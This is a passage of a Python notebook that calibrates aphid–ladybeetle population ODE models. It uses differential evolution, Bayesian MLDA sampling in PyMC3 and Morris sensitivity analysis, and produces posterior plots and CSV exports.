    standard_deviation = pm.Uniform("std_deviation", lower=1, upper=1000, shape=2)  # one noise level per observed series
    # Wrapper for time. We need it this way in order to change it for predictions
    time_calibration = pm.Data("time", time_observations_coarse_1)
    # Defining the deterministic formulation of the problem
    fitting_model = pm.Deterministic(
        "EP2_model",
        EP2_ode_wrapper(
            time_calibration,
            r1_,
            a1_,
            a2_,
            a3_,
            u0_,
            v0_,
        ),
    )
    likelihood_model = pm.Normal(
        "likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit_coarse_1
    )
# Coarse MLDA level 2: fitted to every 2nd observation.
# NOTE(review): this model is built but not passed to pm.MLDA below (only
# coarse_model_1 is) — confirm whether a two-level hierarchy was intended.
coarse_steps_2 = 2
observed_aphids_coarse_2 = observed_aphids[::coarse_steps_2]
observed_ladybeetles_coarse_2 = observed_ladybeetles[::coarse_steps_2]
observations_to_fit_coarse_2 = np.vstack(
    [observed_aphids_coarse_2, observed_ladybeetles_coarse_2]
).T
time_observations_coarse_2 = time_observations[::coarse_steps_2]
with pm.Model() as coarse_model_2:
    # Prior distributions for the model's parameters (must mirror the fine model)
    # r1_ = pm.Uniform(
    #     "r1",
    #     lower=(1.0 - percent_calibration) * r1,
    #     upper=(1.0 + percent_calibration) * r1,
    # )
    r1_ = pm.Data("r1", r1)
    a1_ = pm.Uniform(
        "a1",
        lower=(1.0 - percent_calibration) * a1,
        upper=1e6#(1.0 + percent_calibration) * a1,
    )
    a2_ = pm.Data("a2", a2)
    # a2_ = pm.Uniform(
    #     "a2",
    #     lower=(1.0 - percent_calibration) * a2,
    #     upper=(1.0 + percent_calibration) * a2,
    # )
    a3_ = pm.Uniform(
        "a3",
        lower=(1.0 - percent_calibration) * a3,
        upper=1e6#(1.0 + percent_calibration) * a3,
    )
    # Priors for the initial conditions (held fixed at the observed values)
    u0, v0 = y0
    u0_ = pm.Data("u0", u0)
    v0_ = pm.Data("v0", v0)
    # NOTE(review): lower=0 differs from lower=1 used by the other levels — confirm intended.
    standard_deviation = pm.Uniform("std_deviation", lower=0, upper=1000, shape=2)  # one noise level per observed series
    # Wrapper for time. We need it this way in order to change it for predictions
    time_calibration = pm.Data("time", time_observations_coarse_2)
    # Defining the deterministic formulation of the problem
    fitting_model = pm.Deterministic(
        "EP2_model",
        EP2_ode_wrapper(
            time_calibration,
            r1_,
            a1_,
            a2_,
            a3_,
            u0_,
            v0_,
        ),
    )
    likelihood_model = pm.Normal(
        "likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit_coarse_2
    )
# MLDA sampling: fine-model proposals are pre-screened by the coarse chain.
with fine_model_EP2:
    step = pm.MLDA(coarse_models=[coarse_model_1], subsampling_rates=[5])
    # step = pm.DEMetropolisZ()
    trace_calibration_EP2 = pm.sample(draws=4500, chains=4, cores=4, tune=1000, step=step, random_seed=seed)
duration = time.time() - start_time
print(f"-- Monte Carlo simulations done in {duration / 60:.3f} minutes")
# In[184]:
# Quick look at the marginal posterior of a1.
plt.hist(trace_calibration_EP2['a1'], bins=35)
plt.show()
# In[185]:
# Variables whose posteriors are summarized/plotted below.
calibration_variable_names = [
    "std_deviation",
    "a1",
    "a3",
]
# In[186]:
# Posterior histogram for each calibrated variable.
plot_step = 1
progress_bar = tqdm(calibration_variable_names)
for variable in progress_bar:
    pm.plot_posterior(
        trace_calibration_EP2[::plot_step],
        var_names=(f"{variable}"),
        kind="hist",
        round_to=4,
        point_estimate="mode"
    )
    plt.savefig(f"img/{variable}_posterior_cal_EP2.png")
# In[187]:
# Pairwise joint posteriors (hexbin) with marginals.
az.plot_pair(
    trace_calibration_EP2,
    var_names=calibration_variable_names,
    kind="hexbin",
    fill_last=False,
    marginals=True,
    figsize=(10, 8),
)
plt.savefig("img/marginals_cal_EP2.png")
# In[188]:
df_stats_summary = az.summary(
    data=trace_calibration_EP2,
    var_names=calibration_variable_names,
    kind='stats',
    round_to=15,  # floating-point rounding used in the summary table
)
df_stats_summary
# Auxiliary functions to compute the Most Probable Value (MPV):
# In[189]:
from scipy.stats import gaussian_kde # to calculate MPV from KDE
def _scalar_rv_mvp_estimation(rv_realization_values: np.ndarray) -> np.ndarray:
num_of_realizations = len(rv_realization_values)
kernel = gaussian_kde(rv_realization_values)
equally_spaced_samples = np.linspace(
rv_realization_values.min(),
rv_realization_values.max(),
num_of_realizations
)
kde = kernel(equally_spaced_samples)
kde_max_index = np.argmax(kde)
rv_mpv_value = equally_spaced_samples[kde_max_index]
return rv_mpv_value
def calculate_rv_posterior_mpv(pm_trace, variable_names: list) -> dict:
    """Compute the most probable value (KDE mode) for each traced variable.

    Vector-valued variables are expanded into per-dimension entries named
    ``"name[i]"``. Returns a dict mapping variable name to its MPV.
    """
    mpv_by_name = dict()
    progress_bar = tqdm(variable_names)
    for variable in progress_bar:
        progress_bar.set_description(f"Calculating MPV from KDE for {variable}")
        realizations = pm_trace[f"{variable}"]
        try:
            dimensions = realizations.shape[1]
        except IndexError:
            # 1-D trace: a scalar random variable.
            dimensions = 0
        if dimensions == 0:
            mpv_by_name[f"{variable}"] = _scalar_rv_mvp_estimation(realizations)
        else:
            for dimension in range(dimensions):
                component_name = f"{variable}[{dimension}]"
                component_values = np.array(realizations[:, dimension])
                mpv_by_name[f"{component_name}"] = _scalar_rv_mvp_estimation(component_values)
    return mpv_by_name
def add_mpv_to_summary(arviz_summary: pd.DataFrame, rv_modes_dict: dict) -> pd.DataFrame:
    """Return a copy of the ArviZ summary with an extra ``mpv`` column.

    The input summary is not modified; values are aligned by variable name.
    """
    summary_with_mpv = arviz_summary.copy()
    mpv_series = pd.Series(
        data=list(rv_modes_dict.values()),
        index=list(rv_modes_dict.keys()),
    )
    summary_with_mpv["mpv"] = mpv_series
    return summary_with_mpv
# In[190]:
# Append the KDE-based most probable values to the stats summary and persist.
calibration_variable_mpv = calculate_rv_posterior_mpv(
    pm_trace=trace_calibration_EP2, variable_names=calibration_variable_names
)
df_stats_summary = add_mpv_to_summary(df_stats_summary, calibration_variable_mpv)
df_stats_summary.to_csv("csv/stats_summary_calibration_EP2.csv")  # save to a CSV for later inspection
df_stats_summary
# In[191]:
# 95% credible band and pointwise median of the posterior model trajectories.
percentile_cut = 2.5
y_min = np.percentile(trace_calibration_EP2["EP2_model"], percentile_cut, axis=0)
y_max = np.percentile(trace_calibration_EP2["EP2_model"], 100 - percentile_cut, axis=0)
y_fit = np.percentile(trace_calibration_EP2["EP2_model"], 50, axis=0)
# In[192]:
# Median fit with 95% credible bands against the observed densities.
plt.figure(figsize=(15, 5))
plt.plot(
    time_observations,
    y_fit[:, 0],
    "r",
    label="Aphids (simulated)",
    marker="X",
    linestyle="-",
    markersize=10,
)
plt.fill_between(time_observations, y_min[:, 0], y_max[:, 0], color="r", alpha=0.2)
plt.plot(
    time_observations,
    y_fit[:, 1],
    "b",
    label="Ladybeetles (simulated)",
    marker="o",
    linestyle="-",
    markersize=10,
)
plt.fill_between(time_observations, y_min[:, 1], y_max[:, 1], color="b", alpha=0.2)
plt.plot(
    time_observations,
    aphid_observed.Density.values,
    label="Aphids data",
    marker="s",
    linestyle="",
    markersize=10
)
plt.plot(
    time_observations,
    ladybeetle_observed.Density.values,
    label="Ladybeetles data",
    marker="v",
    linestyle="",
    markersize=10
)
plt.legend(shadow=True)
plt.xlabel('Time', fontsize=15)
plt.ylabel('Population densities', fontsize=15)
plt.tight_layout()
plt.savefig("img/calibration_EP2.png", dpi=300)
plt.show()
# In[193]:
print("-- Exporting calibrated parameter to CSV")
start_time = time.time()
dict_realizations = dict()  # also record the realizations in a Python dict
progress_bar = tqdm(calibration_variable_names[1:])  # skip "std_deviation" (first entry)
for variable in progress_bar:
    progress_bar.set_description(f"Gathering {variable} realizations")
    parameter_realization = trace_calibration_EP2.get_values(f"{variable}")
    dict_realizations[f"{variable}"] = parameter_realization
df_realizations = pd.DataFrame(dict_realizations)
df_realizations.to_csv("csv/calibration_realizations_EP2.csv")
duration = time.time() - start_time
print(f"-- Exported done in {duration:.3f} seconds")
# In[194]:
df_realizations
# # Exponential Prey Growth FR3 model
# ## The parameter a1 doesn't have a maximum threshold
# In[195]:
import matplotlib.pyplot as plt
from numba import jit
import numpy as np # linear algebra
from scipy.integrate import solve_ivp # to solve ODE system
import pandas as pd
@jit(nopython=True)
def EP3_model(
    t,
    X,
    r1 = 1,
    a1 = 1,
    a2 = 1,
    a3 = 1,
):
    """Right-hand side of the EP3 system.

    Prey u grows exponentially at rate r1 and is removed through the
    a1*u^2*v/(a2 + a3*u^2) predation term; predator density v is constant.
    """
    u, v = X
    predation = a1 * u * u * v / (a2 + a3 * u * u)
    du_dt = r1 * u - predation
    dv_dt = 0
    return du_dt, dv_dt
def EP3_ode_solver(
    y0,
    t_span,
    t_eval,
    r1 = 1,
    a1 = 1,
    a2 = 1,
    a3 = 1,
):
    """Integrate the EP3 system with LSODA and return the scipy solution object."""
    return solve_ivp(
        fun=EP3_model,
        t_span=t_span,
        y0=y0,
        t_eval=t_eval,
        args=(r1, a1, a2, a3),
        method="LSODA",
    )
# Experimental time window and observed densities used for EP3 calibration.
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0  # no forecasting beyond the data window
time_range = np.linspace(t0, tf + days_to_forecast, len(aphid_data.Time.values))
u_data = aphid_data.Density.values
v_data = ladybeetle_data.Density.values
# * We now need to calibrate the parameters of the function. Firstly, we have to define a least-squares residual error function:
# In[196]:
def EP3_least_squares_error_ode(
    par, time_exp, f_exp, fitting_model, initial_conditions
):
    """Weighted least-squares misfit between data and an EP3 simulation.

    ``par`` is unpacked as the model parameters and ``f_exp`` holds the two
    observed series (prey, predator). A failed solve (ValueError) yields a
    large penalty so global optimizers move away from that parameter region.
    """
    solver_args = par
    observed_prey, observed_predator = f_exp
    integration_window = (time_exp.min(), time_exp.max())
    prey_weight = 1
    predator_weight = 1
    num_of_qoi = len(f_exp)
    try:
        y_model = fitting_model(initial_conditions, integration_window, time_exp, *solver_args)
        # y_model = fitting_model(time_span, time_exp, *args)
        simulated_prey, simulated_predator = y_model.y
        prey_misfit = prey_weight * np.sum((observed_prey - simulated_prey) ** 2.0)
        predator_misfit = predator_weight * np.sum((observed_predator - simulated_predator) ** 2.0)
        objective_function = 1 / num_of_qoi * (prey_misfit + predator_misfit)
    except ValueError:
        objective_function = 1e15
    return objective_function
def callback_de(xk, convergence):
    """Report optimization progress by printing the current parameter vector.

    Called by scipy's differential_evolution once per generation; the
    ``convergence`` argument is accepted but unused.
    """
    current_parameters = xk
    print(f'parameters = {current_parameters}\n')
# * Now we calibrate minimizing the residual applying the Differential Evolution method, a global optimization method, provided by `scipy`:
# In[197]:
from scipy import optimize
seed = 1234  # reproducibility of the stochastic optimizer
# Initial parameter estimates (from a previous run) used to build the bounds.
r1=0.001333498834664657
a1=0.029060190883154886
a2=2.774935164202579e-05
a3=0.003448649713284258
# Search bounds: 0.1x to 1.9x of each estimate (i.e. +/-90%).
denom_min = 0.1
denom_max = 1.9
bounds_EP3 = [
    ( ( r1 * denom_min ), ( r1 * denom_max ) ),  # r1
    ( ( a1 * denom_min ), ( a1 * denom_max ) ),  # a1
    ( ( a2 * denom_min ), ( a2 * denom_max ) ),  # a2
    ( ( a3 * denom_min ), ( a3 * denom_max ) ),  # a3
]
# Global optimization of the least-squares misfit via differential evolution.
result_EP3 = optimize.differential_evolution(
    EP3_least_squares_error_ode,
    bounds=bounds_EP3,
    args=(
        aphid_data.Time.values,
        [aphid_data.Density.values, ladybeetle_data.Density.values],
        EP3_ode_solver,
        y0,
    ),
    popsize=30,
    strategy="best1bin",
    tol=1e-5,
    recombination=0.95,
    mutation=0.6,
    maxiter=20000, # 2000
    polish=True,
    disp=True,
    seed = seed, # for the sake of reproducibility
    callback=callback_de,
    workers=-1,  # use all available cores
)
print(result_EP3)
# * Retrieving the calibrated parameter values:
# In[198]:
# Re-simulate on a denser time grid (100 points) with the calibrated parameters.
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
(
    r1_deterministic,
    a1_deterministic,
    a2_deterministic,
    a3_deterministic,
) = result_EP3.x
solution_ODE_EP3 = EP3_ode_solver(
    y0,
    (t0, tf + days_to_forecast),
    time_range,
    *result_EP3.x
)
t_computed_EP3, y_computed_EP3 = solution_ODE_EP3.t, solution_ODE_EP3.y
u_EP3, v_EP3 = y_computed_EP3
# Collect the calibrated values for reporting/export.
parameters_dict = {
    "Model": "EP3",
    u"$r1$": r1_deterministic,
    u"$a1$": a1_deterministic,
    u"$a2$": a2_deterministic,
    u"$a3$": a3_deterministic,
}
print("r1=" + str(r1_deterministic) + "\n" + "a1=" + str(a1_deterministic) + "\n" + "a2=" + str(a2_deterministic) + "\n" + "a3=" + str(a3_deterministic) )
df_parameters_calibrated = pd.DataFrame.from_records([parameters_dict])
#print(df_parameters_calibrated.to_latex(index=False))
# #### Simulation
# In[199]:
import matplotlib.pyplot as plt
# Visual check of the deterministic fit against the observations.
aphid_observed = aphid_data[:].copy()
ladybeetle_observed = ladybeetle_data[:].copy()
plt.plot(t_computed_EP3, u_EP3, '-x')
plt.plot(aphid_data.Time.values, aphid_observed.Density.values, 'o', label='Observed')
plt.xlabel('Time')
plt.ylabel('Aphid population')
plt.show()
plt.plot(t_computed_EP3, v_EP3, '-x')
plt.plot(ladybeetle_data.Time.values, ladybeetle_observed.Density.values, 'o', label='Observed')
plt.xlabel('Time')
plt.ylabel('Ladybeetle population')
plt.show()
# ## Sensitivity Analyses
# ### Least-Squares objective function
# In[200]:
from SALib.sample.morris import sample as ee_sample
# Morris screening setup: +/-50% perturbation around the calibrated parameters.
mean_values_params = [
    r1,
    a1,
    a2,
    a3,
]
factors_names = [
    r"$r1$",
    r"$a1$",
    r"$a2$",
    r"$a3$",
]
params_perturbations = 0.5
problem_info = {
    'num_vars': len(mean_values_params),
    'names': factors_names,
    'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[201]:
from tqdm import tqdm
# QoI for this analysis: the least-squares residual at each Morris sample.
num_of_realizations = parameter_values.shape[0]
qoi_sensitivity_outputs = np.zeros(num_of_realizations)
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
    residual_least_squares_result = EP3_least_squares_error_ode(
        parameters_realization,
        aphid_data.Time.values,
        [u_data, v_data],
        EP3_ode_solver,
        y0
    )
    qoi_sensitivity_outputs[realization_index] = residual_least_squares_result
# In[202]:
from SALib.analyze.morris import analyze as ee_analyze
data_time = aphid_data.Time.values
num_of_experimental_points = data_time.shape[0]
# Single Morris analysis of the scalar least-squares QoI; mu* is normalized
# so the indices sum to 1 and parameters can be ranked.
df_Si = pd.DataFrame(columns=[*problem_info['names']])
Si = ee_analyze(problem_info, parameter_values, qoi_sensitivity_outputs, num_levels=grid_level, seed=seed)
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
for idx, param_name in enumerate(problem_info['names']):
    df_Si.loc[0, param_name] = Si['mu_star_normalized'][idx]
df_Si = df_Si.T
df_Si.rename(columns={0: r'$\mu^*$'}, inplace=True)
df_Si.sort_values(by=r'$\mu^*$', ascending=False, inplace=True)
df_Si
# In[203]:
df_Si.T.plot.bar(rot=0, width=3, figsize=(9, 6))
plt.rcParams.update({'font.size': 16})
plt.ylabel(r"$\mu^*$")
plt.legend(fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/sensitivity_least_squares_EP3.png", dpi=300)
plt.show()
# ### Prey (pest) population
# In[204]:
from SALib.sample.morris import sample as ee_sample
# Same Morris screening setup, now for the prey-population trajectory QoI.
mean_values_params = [
    r1,
    a1,
    a2,
    a3,
]
factors_names = [
    r"$r1$",
    r"$a1$",
    r"$a2$",
    r"$a3$",
]
params_perturbations = 0.5
problem_info = {
    'num_vars': len(mean_values_params),
    'names': factors_names,
    'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[205]:
from tqdm import tqdm
# Solve the model for every Morris sample; the QoI is the prey trajectory.
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
num_of_realizations = parameter_values.shape[0]
num_of_time_points = time_range.shape[0]
qoi_sensitivity_outputs = np.zeros([num_of_realizations, num_of_time_points])
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
    realization_ODE_EP3 = EP3_ode_solver(
        y0,
        (t0, tf + days_to_forecast),
        time_range,
        *parameters_realization
    )
    u_realization, v_realization = realization_ODE_EP3.y
    qoi_sensitivity_outputs[realization_index, :] = u_realization
# In[206]:
from SALib.analyze.morris import analyze as ee_analyze
# Pointwise Morris analysis of the prey trajectory: one row of normalized
# mu* and sigma indices per simulated time point.
df_Si = pd.DataFrame(columns=['Time', *problem_info['names']])
df_sigmai = pd.DataFrame(columns=['Time', *problem_info['names']])
df_Si['Time'] = time_range
df_sigmai['Time'] = time_range
for time_point in tqdm(range(num_of_time_points)):
    try:
        Si = ee_analyze(
            problem_info,
            parameter_values,
            qoi_sensitivity_outputs[:, time_point],
            num_levels=grid_level,
            seed=seed
        )
        # Normalize so the indices at each time point sum to 1.
        Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
        sigmai_normalized = Si['sigma'] / Si['sigma'].sum()
        for idx, param_name in enumerate(problem_info['names']):
            df_Si.loc[time_point, param_name] = Si['mu_star_normalized'][idx]
            df_sigmai.loc[time_point, param_name] = sigmai_normalized[idx]
    except Exception:
        # Fix: was a bare `except:`. Keep the best-effort behavior (skip
        # failing time points) without swallowing KeyboardInterrupt/SystemExit.
        continue
# Order by time, drop the initial point and any rows skipped above.
df_Si.sort_values(by='Time', inplace=True)
df_Si.drop(index=0, inplace=True)
df_Si.dropna(inplace=True)
df_Si.reset_index(drop=True, inplace=True)
df_sigmai.sort_values(by='Time', inplace=True)
df_sigmai.drop(index=0, inplace=True)
df_sigmai.dropna(inplace=True)
df_sigmai.reset_index(drop=True, inplace=True)
valid_times = df_Si.Time.values
# Bare expressions: in the notebook these display the normalized index tables.
df_Si
# In[207]:
df_sigmai
# In[208]:
# Stacked-bar plot of the normalized mu* Morris indices over time.
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2  # plot every 2nd valid time point
valid_times_to_plot_mu = valid_times[::step_to_plot]
df_Si[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
# NOTE(review): the formatter indexes by tick position — assumes one tick per
# plotted row; confirm positions stay within range.
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_mu[x]:.2f}")
plt.ylabel(r"Normalized $\mu^*$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_EP3.png", dpi=300)
plt.show()
# In[209]:
# Same stacked-bar plot for the normalized sigma indices.
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_sigma = valid_times[::step_to_plot]
df_sigmai[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_sigma[x]:.2f}")
plt.ylabel(r"Normalized $\sigma$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_sigma_EP3.png", dpi=300)
plt.show()
# ### Time-derivative of pest (prey) population
# In[210]:
def calculate_pest_time_derivative_series(
    time_array,
    u_array,
    v_array,
    ode_model,
    model_pars
):
    """Evaluate the pest (prey) time derivative along a computed trajectory.

    For each time point, the ODE right-hand side is evaluated at the
    corresponding (u, v) state and the prey component (du/dt) is collected.
    Returns a numpy array with one value per entry of ``time_array``.
    """
    derivative_values = [
        ode_model(time, [u_array[idx], v_array[idx]], *model_pars)[0]
        for idx, time in enumerate(time_array)
    ]
    return np.array(derivative_values)
# In[211]:
# Evaluate the pest time derivative along the calibrated EP3 trajectory.
pest_time_derivative_array = calculate_pest_time_derivative_series(
    t_computed_EP3,
    u_EP3,
    v_EP3,
    EP3_model,
    mean_values_params
)
pest_time_derivative_array
# In[212]:
plt.figure(figsize=(9, 7))
plt.plot(t_computed_EP3, u_EP3, '-x', label='Pest population')
plt.plot(t_computed_EP3, pest_time_derivative_array, '-o', label='Pest time derivative')
plt.xlabel('Time')
plt.ylabel('Aphid population')
plt.grid()
plt.legend(shadow=True)
plt.savefig("img/pest_derivative_EP3.png", dpi=300)
plt.show()
# In[213]:
# Morris screening setup for the pest-time-derivative QoI (+/-50% bounds).
mean_values_params = [
    r1,
    a1,
    a2,
    a3,
]
factors_names = [
    r"$r1$",
    r"$a1$",
    r"$a2$",
    r"$a3$",
]
params_perturbations = 0.5
problem_info = {
    'num_vars': len(mean_values_params),
    'names': factors_names,
    'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[214]:
# Solve the model for every Morris sample; the QoI is du/dt along the trajectory.
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
num_of_realizations = parameter_values.shape[0]
num_of_time_points = time_range.shape[0]
qoi_sensitivity_outputs = np.zeros([num_of_realizations, num_of_time_points])
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
    realization_ODE_EP3 = EP3_ode_solver(
        y0,
        (t0, tf + days_to_forecast),
        time_range,
        *parameters_realization
    )
    u_realization, v_realization = realization_ODE_EP3.y
    pest_time_derivative_array = calculate_pest_time_derivative_series(
        time_range,
        u_realization,
        v_realization,
        EP3_model,
        parameters_realization
    )
    qoi_sensitivity_outputs[realization_index, :] = pest_time_derivative_array
# In[215]:
# Pointwise Morris analysis of the pest-derivative trajectory: one row of
# normalized mu* and sigma indices per simulated time point.
df_Si = pd.DataFrame(columns=['Time', *problem_info['names']])
df_sigmai = pd.DataFrame(columns=['Time', *problem_info['names']])
df_Si['Time'] = time_range
df_sigmai['Time'] = time_range
for time_point in tqdm(range(num_of_time_points)):
    try:
        Si = ee_analyze(
            problem_info,
            parameter_values,
            qoi_sensitivity_outputs[:, time_point],
            num_levels=grid_level,
            seed=seed
        )
        # Normalize so the indices at each time point sum to 1.
        Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
        sigmai_normalized = Si['sigma'] / Si['sigma'].sum()
        for idx, param_name in enumerate(problem_info['names']):
            df_Si.loc[time_point, param_name] = Si['mu_star_normalized'][idx]
            df_sigmai.loc[time_point, param_name] = sigmai_normalized[idx]
    except Exception:
        # Fix: was a bare `except:`. Keep the best-effort behavior (skip
        # failing time points) without swallowing KeyboardInterrupt/SystemExit.
        continue
# Order by time, drop the initial point and any rows skipped above.
df_Si.sort_values(by='Time', inplace=True)
df_Si.drop(index=0, inplace=True)
df_Si.dropna(inplace=True)
df_Si.reset_index(drop=True, inplace=True)
df_sigmai.sort_values(by='Time', inplace=True)
df_sigmai.drop(index=0, inplace=True)
df_sigmai.dropna(inplace=True)
df_sigmai.reset_index(drop=True, inplace=True)
valid_times = df_Si.Time.values
# Bare expressions: in the notebook these display the normalized index tables.
df_Si
# In[216]:
df_sigmai
# In[217]:
# Stacked-bar plot of the normalized mu* Morris indices over time.
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2  # plot every 2nd valid time point
valid_times_to_plot_mu = valid_times[::step_to_plot]
df_Si[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
# NOTE(review): the formatter indexes by tick position — assumes one tick per
# plotted row; confirm positions stay within range.
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_mu[x]:.2f}")
plt.ylabel(r"Normalized $\mu^*$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_derivative_EP3.png", dpi=300)
plt.show()
# In[218]:
# Same stacked-bar plot for the normalized sigma indices.
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_sigma = valid_times[::step_to_plot]
df_sigmai[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_sigma[x]:.2f}")
plt.ylabel(r"Normalized $\sigma$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_sigma_derivative_EP3.png", dpi=300)
plt.show()
# ## Bayesian calibration
# In[219]:
# Wrap the EP3 ODE solve as a Theano op so PyMC3 can use it as a deterministic
# node; as_op provides no gradient, so only gradient-free samplers work.
@theano.compile.ops.as_op(
    itypes=[
        t.dvector,  # time_exp
        t.dscalar, # r1
        t.dscalar, # a1
        t.dscalar, # a2
        t.dscalar, # a3
        t.dscalar, # u0
        t.dscalar, # v0
    ],
    otypes=[t.dmatrix]
)
def EP3_ode_wrapper(time_exp, r1, a1, a2, a3, u0, v0):
    """Solve the EP3 system over time_exp and return an (n_times, 2) array."""
    time_span = (time_exp.min(), time_exp.max())
    args = [r1, a1, a2, a3]
    initial_conditions = np.array([u0, v0])
    y_model = solve_ivp(
        EP3_model,
        time_span,
        initial_conditions,
        t_eval=time_exp,
        method='LSODA',
        args=args
    )
    simulated_time = y_model.t  # unused; kept for symmetry with other cells
    simulated_ode_solution = y_model.y
    simulated_qoi1, simulated_qoi2 = simulated_ode_solution
    # Stack prey/predator as columns to match the observations layout.
    concatenate_simulated_qoi = np.vstack([simulated_qoi1, simulated_qoi2]).T
    return concatenate_simulated_qoi
# In[220]:
# Observations and settings shared by the PyMC3 models below.
observed_aphids = aphid_observed.Density.values.astype(np.float64)
observed_ladybeetles = ladybeetle_observed.Density.values.astype(np.float64)
observations_to_fit = np.vstack([observed_aphids, observed_ladybeetles]).T # note the transpose here
time_observations = aphid_data.Time.values.astype(np.float64)
print("\n*** Performing Bayesian calibration ***")
print("-- Running Monte Carlo simulations:")
draws = 1000  # NOTE(review): unused — pm.sample below hard-codes draws=4500
start_time = time.time()
percent_calibration = 0.95  # relative half-width used to build the uniform priors
# Fine-level model for MLDA: fitted against the full observation set.
with pm.Model() as fine_model_EP3:
    # Prior distributions for the model's parameters.
    # r1 and a2 are held fixed at their deterministic estimates via pm.Data;
    # the commented Uniform blocks show the previously tried alternative.
    # r1_ = pm.Uniform(
    #     "r1",
    #     lower=(1.0 - percent_calibration) * r1,
    #     upper=(1.0 + percent_calibration) * r1,
    # )
    r1_ = pm.Data("r1", r1)
    # NOTE(review): upper bound hard-coded to 1e6 (original bound kept commented).
    a1_ = pm.Uniform(
        "a1",
        lower=(1.0 - percent_calibration) * a1,
        upper=1e6#(1.0 + 10 * percent_calibration) * a1,
    )
    a2_ = pm.Data("a2", a2)
    # a2_ = pm.Uniform(
    #     "a2",
    #     lower=(1.0 - percent_calibration) * a2,
    #     upper=(1.0 + percent_calibration) * a2,
    # )
    a3_ = pm.Uniform(
        "a3",
        lower=(1.0 - percent_calibration) * a3,
        upper=1e6#(1.0 + 10 * percent_calibration) * a3,
    )
    # Priors for the initial conditions (held fixed at the observed values)
    u0, v0 = y0
    u0_ = pm.Data("u0", u0)
    v0_ = pm.Data("v0", v0)
    standard_deviation = pm.Uniform("std_deviation", lower=1, upper=1000, shape=2)  # one noise level per observed series
    # Wrapper for time. We need it this way in order to change it for predictions
    time_calibration = pm.Data("time", time_observations)
    # Defining the deterministic formulation of the problem
    fitting_model = pm.Deterministic(
        "EP3_model",
        EP3_ode_wrapper(
            time_calibration,
            r1_,
            a1_,
            a2_,
            a3_,
            u0_,
            v0_,
        ),
    )
    likelihood_model = pm.Normal(
        "likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit
    )
# Coarse MLDA level 1: the same model fitted to every 4th observation.
coarse_steps_1 = 4
observed_aphids_coarse_1 = observed_aphids[::coarse_steps_1]
observed_ladybeetles_coarse_1 = observed_ladybeetles[::coarse_steps_1]
observations_to_fit_coarse_1 = np.vstack(
    [observed_aphids_coarse_1, observed_ladybeetles_coarse_1]
).T
time_observations_coarse_1 = time_observations[::coarse_steps_1]
with pm.Model() as coarse_model_1:
    # Prior distributions for the model's parameters (must mirror the fine model)
    # r1_ = pm.Uniform(
    #     "r1",
    #     lower=(1.0 - percent_calibration) * r1,
    #     upper=(1.0 + percent_calibration) * r1,
    # )
    r1_ = pm.Data("r1", r1)
    a1_ = pm.Uniform(
        "a1",
        lower=(1.0 - percent_calibration) * a1,
        upper=1e6#(1.0 + 10 * percent_calibration) * a1,
    )
    a2_ = pm.Data("a2", a2)
    # a2_ = pm.Uniform(
    #     "a2",
    #     lower=(1.0 - percent_calibration) * a2,
    #     upper=(1.0 + percent_calibration) * a2,
    # )
    a3_ = pm.Uniform(
        "a3",
